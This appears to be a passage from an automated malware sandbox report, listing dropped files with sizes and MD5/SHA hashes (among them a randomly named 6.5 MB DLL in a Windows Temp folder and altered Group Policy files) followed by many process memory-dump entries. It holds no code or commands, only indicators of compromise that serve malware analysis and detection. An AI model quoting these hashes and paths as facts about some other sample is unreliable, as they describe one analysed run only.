C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
15KB
MD581d9bb6c4d8c7623a66cb5c8045f3c99
SHA1665d2be3f8554b253be63d0b7729eac7a5688fc3
SHA25671d64a93455867106a61742a0b5618dc32811fbf44e6213f378e02d5e291131a
SHA512f43c91b5fdfdd459bda80189057885c1ea9bcdcb8eee762524afd6efa47efd8823aed14db1987dadd9e9f3de7f6667c8dd77ff77bdd3cc24b703c01e69142dc7
-
C:\Windows\System32\GroupPolicy\gpt.iniFilesize
127B
MD58ef9853d1881c5fe4d681bfb31282a01
SHA1a05609065520e4b4e553784c566430ad9736f19f
SHA2569228f13d82c3dc96b957769f6081e5bac53cffca4ffde0ba1e102d9968f184a2
SHA5125ddee931a08cfea5bb9d1c36355d47155a24d617c2a11d08364ffc54e593064011dee4fea8ac5b67029cab515d3071f0ba0422bb76af492a3115272ba8feb005
-
C:\Windows\Temp\ZmzskowerwXEonlG\RDlwIuxU\aiQnwLv.dllFilesize
6.5MB
MD510562c5851413e8cdb55e941a851dfa1
SHA118d6a4f38daec69e40e7f3e0cae8cb00a470fb0e
SHA2563ade0c5f052d0e702bba440858944d6bf3ca9b116c11769de46a057970853a5f
SHA512e26697a7741e8f7c27085cfe7a57600d407115731753258df094997c3f957b28e2dfb127ec0ae5c0286b86a606d3be926932d04d7886d4b7c7cb3af5a86e92cd
-
C:\Windows\system32\GroupPolicy\Machine\Registry.polFilesize
1KB
MD5cdfd60e717a44c2349b553e011958b85
SHA1431136102a6fb52a00e416964d4c27089155f73b
SHA2560ee08da4da3e4133e1809099fc646468e7156644c9a772f704b80e338015211f
SHA512dfea0d0b3779059e64088ea9a13cd6b076d76c64db99fa82e6612386cae5cda94a790318207470045ef51f0a410b400726ba28cb6ecb6972f081c532e558d6a8
-
C:\Windows\system32\GroupPolicy\Machine\Registry.polFilesize
8KB
MD50a48000b0ebb8e94be299edc703328fe
SHA102c746f931d1bc73303e8b0fa42eb5cb9bc9cc52
SHA25681d9b12cf4c7aeb97fff5d5616bd36e230c3cd69397f2ad1c962582f1072dd47
SHA51201aeeb4e8417c5784c069bcd7511edec7091274a9bd4e9137152d5e18b11ec7c242253983d1d8732dda72c82a9ca46f06696525a6235b41bea04ddd58fa1c0c1
-
C:\Windows\system32\GroupPolicy\gpt.iniFilesize
268B
MD5a62ce44a33f1c05fc2d340ea0ca118a4
SHA11f03eb4716015528f3de7f7674532c1345b2717d
SHA2569f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a
SHA5129d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732
-
memory/408-443-0x0000000000240000-0x000000000070F000-memory.dmpFilesize
4.8MB
-
memory/408-455-0x0000000000240000-0x000000000070F000-memory.dmpFilesize
4.8MB
-
memory/1552-390-0x0000000010000000-0x00000000105DF000-memory.dmpFilesize
5.9MB
-
memory/1600-278-0x000002409B9E0000-0x000002409BB2E000-memory.dmpFilesize
1.3MB
-
memory/1600-229-0x00000240834D0000-0x00000240834F2000-memory.dmpFilesize
136KB
-
memory/1748-181-0x0000000002870000-0x0000000002871000-memory.dmpFilesize
4KB
-
memory/1808-41-0x0000000000780000-0x0000000000781000-memory.dmpFilesize
4KB
-
memory/1808-39-0x0000000000780000-0x0000000000781000-memory.dmpFilesize
4KB
-
memory/1808-38-0x0000000000780000-0x0000000000781000-memory.dmpFilesize
4KB
-
memory/1916-162-0x0000000000400000-0x0000000000459000-memory.dmpFilesize
356KB
-
memory/1916-159-0x0000000000400000-0x0000000000459000-memory.dmpFilesize
356KB
-
memory/2096-40-0x0000000000400000-0x0000000000592000-memory.dmpFilesize
1.6MB
-
memory/2152-398-0x0000000005B50000-0x0000000005BB6000-memory.dmpFilesize
408KB
-
memory/2152-395-0x0000000002CB0000-0x0000000002CE6000-memory.dmpFilesize
216KB
-
memory/2152-413-0x00000000060B0000-0x00000000060CE000-memory.dmpFilesize
120KB
-
memory/2152-396-0x0000000005420000-0x0000000005A48000-memory.dmpFilesize
6.2MB
-
memory/2152-397-0x0000000005370000-0x0000000005392000-memory.dmpFilesize
136KB
-
memory/2152-409-0x0000000005D30000-0x0000000006084000-memory.dmpFilesize
3.3MB
-
memory/2952-106-0x0000000000400000-0x0000000000455000-memory.dmpFilesize
340KB
-
memory/2952-104-0x0000000000400000-0x0000000000455000-memory.dmpFilesize
340KB
-
memory/2984-160-0x0000000000580000-0x0000000000581000-memory.dmpFilesize
4KB
-
memory/3020-94-0x0000000000750000-0x00000000007A2000-memory.dmpFilesize
328KB
-
memory/3020-263-0x0000000006AD0000-0x0000000006B36000-memory.dmpFilesize
408KB
-
memory/3020-161-0x0000000005CE0000-0x0000000005D56000-memory.dmpFilesize
472KB
-
memory/3020-412-0x0000000008800000-0x0000000008D2C000-memory.dmpFilesize
5.2MB
-
memory/3020-411-0x0000000008100000-0x00000000082C2000-memory.dmpFilesize
1.8MB
-
memory/3020-387-0x0000000007EE0000-0x0000000007F30000-memory.dmpFilesize
320KB
-
memory/3020-212-0x0000000006820000-0x000000000685C000-memory.dmpFilesize
240KB
-
memory/3020-209-0x0000000006D30000-0x0000000007348000-memory.dmpFilesize
6.1MB
-
memory/3068-215-0x000000001DF60000-0x000000001DF72000-memory.dmpFilesize
72KB
-
memory/3068-272-0x000000001F080000-0x000000001F5A8000-memory.dmpFilesize
5.2MB
-
memory/3068-222-0x000000001E380000-0x000000001E3F6000-memory.dmpFilesize
472KB
-
memory/3068-269-0x000000001E980000-0x000000001EB42000-memory.dmpFilesize
1.8MB
-
memory/3068-216-0x000000001DFC0000-0x000000001DFFC000-memory.dmpFilesize
240KB
-
memory/3068-214-0x000000001E070000-0x000000001E17A000-memory.dmpFilesize
1.0MB
-
memory/3068-101-0x0000000000250000-0x00000000002BC000-memory.dmpFilesize
432KB
-
memory/3068-223-0x000000001BD00000-0x000000001BD1E000-memory.dmpFilesize
120KB
-
memory/3164-1035-0x0000000000240000-0x000000000070F000-memory.dmpFilesize
4.8MB
-
memory/3164-1033-0x0000000000240000-0x000000000070F000-memory.dmpFilesize
4.8MB
-
memory/3336-122-0x0000000000240000-0x000000000070F000-memory.dmpFilesize
4.8MB
-
memory/3336-173-0x0000000000240000-0x000000000070F000-memory.dmpFilesize
4.8MB
-
memory/3568-64-0x00000000054F0000-0x0000000005582000-memory.dmpFilesize
584KB
-
memory/3568-213-0x0000000006E30000-0x0000000006E7C000-memory.dmpFilesize
304KB
-
memory/3568-210-0x0000000006D20000-0x0000000006E2A000-memory.dmpFilesize
1.0MB
-
memory/3568-211-0x0000000006C60000-0x0000000006C72000-memory.dmpFilesize
72KB
-
memory/3568-183-0x0000000006A90000-0x0000000006AAE000-memory.dmpFilesize
120KB
-
memory/3568-62-0x0000000000BF0000-0x0000000000C42000-memory.dmpFilesize
328KB
-
memory/3568-95-0x00000000055B0000-0x00000000055BA000-memory.dmpFilesize
40KB
-
memory/3568-63-0x0000000005B80000-0x0000000006124000-memory.dmpFilesize
5.6MB
-
memory/3696-2-0x00000000005C1000-0x00000000005EF000-memory.dmpFilesize
184KB
-
memory/3696-1-0x00000000775E4000-0x00000000775E6000-memory.dmpFilesize
8KB
-
memory/3696-3-0x00000000005C0000-0x0000000000A8F000-memory.dmpFilesize
4.8MB
-
memory/3696-4-0x00000000005C0000-0x0000000000A8F000-memory.dmpFilesize
4.8MB
-
memory/3696-17-0x00000000005C0000-0x0000000000A8F000-memory.dmpFilesize
4.8MB
-
memory/3696-0-0x00000000005C0000-0x0000000000A8F000-memory.dmpFilesize
4.8MB
-
memory/3812-519-0x0000000000240000-0x000000000070F000-memory.dmpFilesize
4.8MB
-
memory/3812-22-0x0000000000240000-0x000000000070F000-memory.dmpFilesize
4.8MB
-
memory/3812-418-0x0000000000240000-0x000000000070F000-memory.dmpFilesize
4.8MB
-
memory/3812-221-0x0000000000240000-0x000000000070F000-memory.dmpFilesize
4.8MB
-
memory/3812-415-0x0000000000240000-0x000000000070F000-memory.dmpFilesize
4.8MB
-
memory/3812-16-0x0000000000240000-0x000000000070F000-memory.dmpFilesize
4.8MB
-
memory/3812-296-0x0000000000240000-0x000000000070F000-memory.dmpFilesize
4.8MB
-
memory/3812-19-0x0000000000240000-0x000000000070F000-memory.dmpFilesize
4.8MB
-
memory/3812-20-0x0000000000240000-0x000000000070F000-memory.dmpFilesize
4.8MB
-
memory/3812-442-0x0000000000240000-0x000000000070F000-memory.dmpFilesize
4.8MB
-
memory/3812-21-0x0000000000240000-0x000000000070F000-memory.dmpFilesize
4.8MB
-
memory/3812-752-0x0000000000240000-0x000000000070F000-memory.dmpFilesize
4.8MB
-
memory/3812-393-0x0000000000240000-0x000000000070F000-memory.dmpFilesize
4.8MB
-
memory/3812-465-0x0000000000240000-0x000000000070F000-memory.dmpFilesize
4.8MB
-
memory/3812-325-0x0000000000240000-0x000000000070F000-memory.dmpFilesize
4.8MB
-
memory/3812-503-0x0000000000240000-0x000000000070F000-memory.dmpFilesize
4.8MB
-
memory/3812-500-0x0000000000240000-0x000000000070F000-memory.dmpFilesize
4.8MB
-
memory/3812-107-0x0000000000240000-0x000000000070F000-memory.dmpFilesize
4.8MB
-
memory/3812-388-0x0000000000240000-0x000000000070F000-memory.dmpFilesize
4.8MB
-
memory/4128-182-0x0000000000400000-0x000000000063B000-memory.dmpFilesize
2.2MB
-
memory/4128-180-0x0000000000400000-0x000000000063B000-memory.dmpFilesize
2.2MB
-
memory/4236-433-0x0000000010000000-0x00000000105DF000-memory.dmpFilesize
5.9MB
-
memory/4468-105-0x00000000008B0000-0x00000000008B1000-memory.dmpFilesize
4KB
-
memory/4748-220-0x0000000000400000-0x0000000000408000-memory.dmpFilesize
32KB
-
memory/4976-208-0x00000222BC740000-0x00000222BC77C000-memory.dmpFilesize
240KB
-
memory/4976-217-0x00000222BCB10000-0x00000222BCB16000-memory.dmpFilesize
24KB
-
memory/4976-218-0x00000222D6BC0000-0x00000222D6C1C000-memory.dmpFilesize
368KB
-
memory/5248-520-0x0000000010000000-0x00000000105DF000-memory.dmpFilesize
5.9MB
-
memory/5248-532-0x0000000002630000-0x00000000026B5000-memory.dmpFilesize
532KB
-
memory/5248-585-0x0000000002E80000-0x0000000002EE9000-memory.dmpFilesize
420KB
-
memory/5272-438-0x0000000006DA0000-0x0000000006E36000-memory.dmpFilesize
600KB
-
memory/5272-422-0x0000000006270000-0x00000000065C4000-memory.dmpFilesize
3.3MB
-
memory/5272-439-0x0000000006D20000-0x0000000006D3A000-memory.dmpFilesize
104KB
-
memory/5272-440-0x0000000006D70000-0x0000000006D92000-memory.dmpFilesize
136KB
-
memory/5564-469-0x0000000005C90000-0x0000000005CAA000-memory.dmpFilesize
104KB
-
memory/5564-437-0x00000000073D0000-0x0000000007692000-memory.dmpFilesize
2.8MB
-
memory/5564-444-0x00000000044C0000-0x00000000044C6000-memory.dmpFilesize
24KB
-
memory/5564-470-0x0000000006190000-0x0000000006196000-memory.dmpFilesize
24KB
-
memory/5564-274-0x0000000000150000-0x00000000001BA000-memory.dmpFilesize
424KB
-
memory/5564-275-0x0000000004B50000-0x0000000004BEC000-memory.dmpFilesize
624KB
-
memory/5988-345-0x0000019A69C00000-0x0000019A6A852000-memory.dmpFilesize
12.3MB
-
memory/6020-598-0x0000000000400000-0x000000000045C000-memory.dmpFilesize
368KB
-
memory/6020-600-0x0000000000400000-0x000000000045C000-memory.dmpFilesize
368KB
-
memory/6084-368-0x0000000140000000-0x000000014159C000-memory.dmpFilesize
21.6MB
-
memory/6084-372-0x0000000140000000-0x000000014159C000-memory.dmpFilesize
21.6MB
-
memory/6084-369-0x0000000140000000-0x000000014159C000-memory.dmpFilesize
21.6MB
-
memory/6084-349-0x0000000140000000-0x000000014159C000-memory.dmpFilesize
21.6MB
-
memory/6084-371-0x0000000140000000-0x000000014159C000-memory.dmpFilesize
21.6MB
-
memory/6084-389-0x0000000140000000-0x000000014159C000-memory.dmpFilesize
21.6MB